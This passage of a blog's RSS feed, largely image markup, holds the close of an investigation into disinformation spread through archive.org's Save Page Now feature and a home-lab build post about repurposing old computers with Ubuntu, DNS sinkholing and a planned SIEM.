srcset="https://substackcdn.com/image/fetch/$s_!XlE5!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fc49cfd48-7c8a-4a3e-b2d7-d27f9dc06026_800x412.png 424w, https://substackcdn.com/image/fetch/$s_!XlE5!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fc49cfd48-7c8a-4a3e-b2d7-d27f9dc06026_800x412.png 848w, https://substackcdn.com/image/fetch/$s_!XlE5!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fc49cfd48-7c8a-4a3e-b2d7-d27f9dc06026_800x412.png 1272w, https://substackcdn.com/image/fetch/$s_!XlE5!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fc49cfd48-7c8a-4a3e-b2d7-d27f9dc06026_800x412.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a><figcaption class="image-caption">IP Address History for ABC14News</figcaption></figure></div><p>It appears as if the modus operandi for ABC14News is to regurgitate Fox News stories but to replace the words with synonyms so as not overtly to plagiarize the work. Take a look at the two links below. View them side by side, and you will see what I mean.</p><p><strong><a href="https://abc14news.com/2020/02/27/sanders-hit-for-lackluster-record-of-getting-bills-passed-despite-decades-in-congress/" title="https://abc14news.com/2020/02/27/sanders-hit-for-lackluster-record-of-getting-bills-passed-despite-decades-in-congress/">Sanders hit for lackluster record of getting bills passed despite decades in Congress | ABC 14 News</a></strong><a href="https://abc14news.com/2020/02/27/sanders-hit-for-lackluster-record-of-getting-bills-passed-despite-decades-in-congress/" title="https://abc14news.com/2020/02/27/sanders-hit-for-lackluster-record-of-getting-bills-passed-despite-decades-in-congress/"><br></a><em><a href="https://abc14news.com/2020/02/27/sanders-hit-for-lackluster-record-of-getting-bills-passed-despite-decades-in-congress/" title="https://abc14news.com/2020/02/27/sanders-hit-for-lackluster-record-of-getting-bills-passed-despite-decades-in-congress/">Sen. Bernie Sanders is using a lot more hits from critics who problem regardless of whether the White Dwelling hopeful&#8230;</a></em><a href="https://abc14news.com/2020/02/27/sanders-hit-for-lackluster-record-of-getting-bills-passed-despite-decades-in-congress/" title="https://abc14news.com/2020/02/27/sanders-hit-for-lackluster-record-of-getting-bills-passed-despite-decades-in-congress/">abc14news.com</a>.</p><p><strong><a href="https://www.foxnews.com/politics/sanders-hit-for-lackluster-record-of-getting-bills-passed-over-decades-in-congress" title="https://www.foxnews.com/politics/sanders-hit-for-lackluster-record-of-getting-bills-passed-over-decades-in-congress">Sanders hit for lackluster record of getting bills passed despite decades in Congress</a></strong><a href="https://www.foxnews.com/politics/sanders-hit-for-lackluster-record-of-getting-bills-passed-over-decades-in-congress" title="https://www.foxnews.com/politics/sanders-hit-for-lackluster-record-of-getting-bills-passed-over-decades-in-congress"><br></a><em><a href="https://www.foxnews.com/politics/sanders-hit-for-lackluster-record-of-getting-bills-passed-over-decades-in-congress" title="https://www.foxnews.com/politics/sanders-hit-for-lackluster-record-of-getting-bills-passed-over-decades-in-congress">Sen. Bernie Sanders is taking more hits from critics who question whether the White House hopeful achieved anything of&#8230;</a></em><a href="https://www.foxnews.com/politics/sanders-hit-for-lackluster-record-of-getting-bills-passed-over-decades-in-congress" title="https://www.foxnews.com/politics/sanders-hit-for-lackluster-record-of-getting-bills-passed-over-decades-in-congress">www.foxnews.com</a></p><p>Below is an analysis of ABC14News from NewsGuard:</p><div class="captioned-image-container"><figure><figcaption class="image-caption">Newsguard Analysis of ABC14News</figcaption></figure></div><h4>Sample 2 Conclusion:</h4><p>This piece is pure disinformation and shared via archive.org for malice. While attributing the author was not possible, it seems that it may be motivated by international relations or politics &#8212; possibly perpetrated by a state-sponsored actor. Because of all the moving parts with this, it became complex very quickly. There are other rabbit holes to pursue this, but I thought this was a good stopping point for now.</p><h3>How did this happen?</h3><p>So how did these articles come to light and use Archive.org as a mule to spread disinformation? Simple, they exploited a single feature in the Wayback Machine &#8212; The <em>Save Page Now&#710;feature. </em>This can be triggered and used to create an alternative link to the article so that if in the case of Sample 1, it gets taken down, it is still shareable.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!jlNL!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F1078d3ef-b3e0-415c-b54b-e9c44b267bd5_800x586.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!jlNL!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F1078d3ef-b3e0-415c-b54b-e9c44b267bd5_800x586.png 424w, https://substackcdn.com/image/fetch/$s_!jlNL!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F1078d3ef-b3e0-415c-b54b-e9c44b267bd5_800x586.png 848w, https://substackcdn.com/image/fetch/$s_!jlNL!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F1078d3ef-b3e0-415c-b54b-e9c44b267bd5_800x586.png 1272w, https://substackcdn.com/image/fetch/$s_!jlNL!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F1078d3ef-b3e0-415c-b54b-e9c44b267bd5_800x586.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!jlNL!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F1078d3ef-b3e0-415c-b54b-e9c44b267bd5_800x586.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/1078d3ef-b3e0-415c-b54b-e9c44b267bd5_800x586.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!jlNL!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F1078d3ef-b3e0-415c-b54b-e9c44b267bd5_800x586.png 424w, https://substackcdn.com/image/fetch/$s_!jlNL!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F1078d3ef-b3e0-415c-b54b-e9c44b267bd5_800x586.png 848w, https://substackcdn.com/image/fetch/$s_!jlNL!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F1078d3ef-b3e0-415c-b54b-e9c44b267bd5_800x586.png 1272w, https://substackcdn.com/image/fetch/$s_!jlNL!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F1078d3ef-b3e0-415c-b54b-e9c44b267bd5_800x586.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a><figcaption class="image-caption">Using the Wayback Machine (Internet Archive at archive.org)</figcaption></figure></div><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!ANp9!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F7b951c48-cec4-4415-bb47-d031167875cb_800x657.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!ANp9!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F7b951c48-cec4-4415-bb47-d031167875cb_800x657.png 424w, https://substackcdn.com/image/fetch/$s_!ANp9!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F7b951c48-cec4-4415-bb47-d031167875cb_800x657.png 848w, https://substackcdn.com/image/fetch/$s_!ANp9!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F7b951c48-cec4-4415-bb47-d031167875cb_800x657.png 1272w, https://substackcdn.com/image/fetch/$s_!ANp9!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F7b951c48-cec4-4415-bb47-d031167875cb_800x657.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!ANp9!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F7b951c48-cec4-4415-bb47-d031167875cb_800x657.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/7b951c48-cec4-4415-bb47-d031167875cb_800x657.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!ANp9!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F7b951c48-cec4-4415-bb47-d031167875cb_800x657.png 424w, https://substackcdn.com/image/fetch/$s_!ANp9!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F7b951c48-cec4-4415-bb47-d031167875cb_800x657.png 848w, https://substackcdn.com/image/fetch/$s_!ANp9!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F7b951c48-cec4-4415-bb47-d031167875cb_800x657.png 1272w, https://substackcdn.com/image/fetch/$s_!ANp9!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F7b951c48-cec4-4415-bb47-d031167875cb_800x657.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a><figcaption class="image-caption">, The Save This Page now feature in Internet Archive (archive.org)</figcaption></figure></div><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!UKgy!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fd24aa944-ee30-449a-847e-30795d94e537_800x206.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!UKgy!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fd24aa944-ee30-449a-847e-30795d94e537_800x206.png 424w, https://substackcdn.com/image/fetch/$s_!UKgy!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fd24aa944-ee30-449a-847e-30795d94e537_800x206.png 848w, https://substackcdn.com/image/fetch/$s_!UKgy!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fd24aa944-ee30-449a-847e-30795d94e537_800x206.png 1272w, https://substackcdn.com/image/fetch/$s_!UKgy!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fd24aa944-ee30-449a-847e-30795d94e537_800x206.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!UKgy!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fd24aa944-ee30-449a-847e-30795d94e537_800x206.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/d24aa944-ee30-449a-847e-30795d94e537_800x206.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!UKgy!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fd24aa944-ee30-449a-847e-30795d94e537_800x206.png 424w, https://substackcdn.com/image/fetch/$s_!UKgy!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fd24aa944-ee30-449a-847e-30795d94e537_800x206.png 848w, https://substackcdn.com/image/fetch/$s_!UKgy!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fd24aa944-ee30-449a-847e-30795d94e537_800x206.png 1272w, https://substackcdn.com/image/fetch/$s_!UKgy!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fd24aa944-ee30-449a-847e-30795d94e537_800x206.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a><figcaption class="image-caption">Sample 1&#8217;s indexing data.</figcaption></figure></div><p>It appears as something within the Wikipedia Eventstream triggered indexing and saving of sample 2.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!wrXN!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F55132a45-9e86-4b1b-bd47-653ebd397e72_800x131.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!wrXN!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F55132a45-9e86-4b1b-bd47-653ebd397e72_800x131.png 424w, https://substackcdn.com/image/fetch/$s_!wrXN!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F55132a45-9e86-4b1b-bd47-653ebd397e72_800x131.png 848w, https://substackcdn.com/image/fetch/$s_!wrXN!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F55132a45-9e86-4b1b-bd47-653ebd397e72_800x131.png 1272w, https://substackcdn.com/image/fetch/$s_!wrXN!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F55132a45-9e86-4b1b-bd47-653ebd397e72_800x131.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!wrXN!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F55132a45-9e86-4b1b-bd47-653ebd397e72_800x131.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/55132a45-9e86-4b1b-bd47-653ebd397e72_800x131.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!wrXN!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F55132a45-9e86-4b1b-bd47-653ebd397e72_800x131.png 424w, https://substackcdn.com/image/fetch/$s_!wrXN!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F55132a45-9e86-4b1b-bd47-653ebd397e72_800x131.png 848w, https://substackcdn.com/image/fetch/$s_!wrXN!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F55132a45-9e86-4b1b-bd47-653ebd397e72_800x131.png 1272w, https://substackcdn.com/image/fetch/$s_!wrXN!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F55132a45-9e86-4b1b-bd47-653ebd397e72_800x131.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a><figcaption class="image-caption">Sample 2&#8217;s indexing data</figcaption></figure></div><h3>Final Conclusion</h3><p>No good deed goes unpunished. Archive.org was stood up to memorialize parts of the internet for research and leisure purposes, and like anything else, someone has found a way to weaponize it. Be cautious of the links you share and those you see other people sharing. Feel free to use this article to help explain what is off about the pieces and why it is disinformation meant to harm people. As to who those people are, the jury is still out on that one.</p>]]></content:encoded></item><item><title><![CDATA[Building My Home Lab: Part 1]]></title><description><![CDATA[I have been collecting old computers from friends and family for some time, and I always said that I was going to stand up a lab. I have&#8230;]]></description><link>https://tidbit.theosintion.com/p/building-my-home-lab-part-1-dd7daaf6e2e4</link><guid isPermaLink="false">https://tidbit.theosintion.com/p/building-my-home-lab-part-1-dd7daaf6e2e4</guid><dc:creator><![CDATA[Joe Gray]]></dc:creator><pubDate>Fri, 10 Jan 2020 11:01:01 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!mW4K!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F77bb4750-1e3a-4d0a-8f29-a538cbcb758b_800x534.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!mW4K!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F77bb4750-1e3a-4d0a-8f29-a538cbcb758b_800x534.jpeg" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!mW4K!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F77bb4750-1e3a-4d0a-8f29-a538cbcb758b_800x534.jpeg 424w, https://substackcdn.com/image/fetch/$s_!mW4K!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F77bb4750-1e3a-4d0a-8f29-a538cbcb758b_800x534.jpeg 848w, https://substackcdn.com/image/fetch/$s_!mW4K!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F77bb4750-1e3a-4d0a-8f29-a538cbcb758b_800x534.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!mW4K!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F77bb4750-1e3a-4d0a-8f29-a538cbcb758b_800x534.jpeg 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!mW4K!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F77bb4750-1e3a-4d0a-8f29-a538cbcb758b_800x534.jpeg" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/77bb4750-1e3a-4d0a-8f29-a538cbcb758b_800x534.jpeg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!mW4K!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F77bb4750-1e3a-4d0a-8f29-a538cbcb758b_800x534.jpeg 424w, https://substackcdn.com/image/fetch/$s_!mW4K!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F77bb4750-1e3a-4d0a-8f29-a538cbcb758b_800x534.jpeg 848w, https://substackcdn.com/image/fetch/$s_!mW4K!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F77bb4750-1e3a-4d0a-8f29-a538cbcb758b_800x534.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!mW4K!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F77bb4750-1e3a-4d0a-8f29-a538cbcb758b_800x534.jpeg 1456w" sizes="100vw" fetchpriority="high"></picture><div></div></div></a><figcaption class="image-caption">Photo by <a href="https://www.pexels.com/@cookiecutter?utm_content=attributionCopyText&amp;utm_medium=referral&amp;utm_source=pexels">panumas nikhomkhai </a>from <a href="https://www.pexels.com/photo/bandwidth-close-up-computer-connection-1148820/?utm_content=attributionCopyText&amp;utm_medium=referral&amp;utm_source=pexels">Pexels</a></figcaption></figure></div><p>I have been collecting old computers from friends and family for some time, and I always said that I was going to stand up a lab. I have finally started to put this in motion. Right now, I have a new (to me) iMac, Dell XPS laptop, and HP laptop (all thanks to <a href="https://medium.com/u/280cb82e1e91">Adrian Sanabria</a>) as well as three old HP laptops from my mom and late uncle. I also have an old Toshiba Portege netbook and 2 HP desktop replacement (17&#8221; laptops).</p><h3>Limitations and Interim</h3><p>Until I buy a proper switch, I am using two old wireless routers (I will flash one with DD-WRT) that I am going to reconfigure to act as switches. I also got a Ubiquiti Edge Router X from Adrian to deploy. I will also be attaching a 2TB and a 6TB external hard drive to systems as network storage. I have two old Apple Xserves, but I need to get RAM and Hard Drives for them (not to mention a rack and better cooling than a home A/C system and a ceiling fan).</p><p>My plan as it is right now is to install Ubuntu on each system. I will be running DHCP, DNS (with sinkhole), and NTP from one host (likely the one with the least processing power) and a SEIM on another. I am unsure if I will install GrayLog (h/t <a href="https://medium.com/u/2ae11795cfbe">Lennart Koopmans</a> maybe I should for namesake alone), OSSIM, or Elastic Search.</p><h3>Current Home Network Configuration</h3><p>I am currently using the sub-optimal modem provided by my ISP. I have a Netgear Nighthawk CM1200, but my ISP is not allowing personally owned devices on their 940Mbps connections. Bummer.</p><p>I have a Ubiquiti AmpliFi mesh wireless system. I am running two distinct networks on both 2.4 and 5 GHz, one for general computing and the other for IOT toys. I will be using wired connections for the lab.</p><p>I also plan to buy a Netgate pfSense appliance to put in-line with my home connection, so that will alleviate some burden off the other systems.</p><h3>What will I do once I get everything configured and running?</h3><p>First, I need to replace a few cables (power and USB) then I will retrieve any relevant data then overwrite the hard drives with Ubuntu, I am using 18.04 right now. After that, I will examine distributed computing models for various projects that I am working on in my free time. I am working on beefing up my Python skills and want to learn more about Machine Learning and Natural Language processing, which both tie into my current project, the DECEPTICON Bot (more details on that soon).</p><p>I may also do some research with Go as well. I don&#8217;t want to experiment with Blockchain or Cryptocurrency right now, so I would need to find another good use of lightweight code and inexpensive devices.</p><p>I plan to do some security research (offensive and defensive) as well as more ML, NLP, and other buzz word research.</p><p>That&#8217;s all I have got for now. Stay tuned for the next installment.</p>]]></content:encoded></item><item><title><![CDATA[Research Update: Week of December 15 — Python]]></title><description><![CDATA[After one week of research and trial and error, I have some more progress to publish/report. I started the week by installing the packages&#8230;]]></description><link>https://tidbit.theosintion.com/p/research-update-week-of-december-15-python-3f4b6517909b</link><guid isPermaLink="false">https://tidbit.theosintion.com/p/research-update-week-of-december-15-python-3f4b6517909b</guid><dc:creator><![CDATA[Joe Gray]]></dc:creator><pubDate>Sun, 15 Dec 2019 14:01:01 GMT</pubDate><enclosure 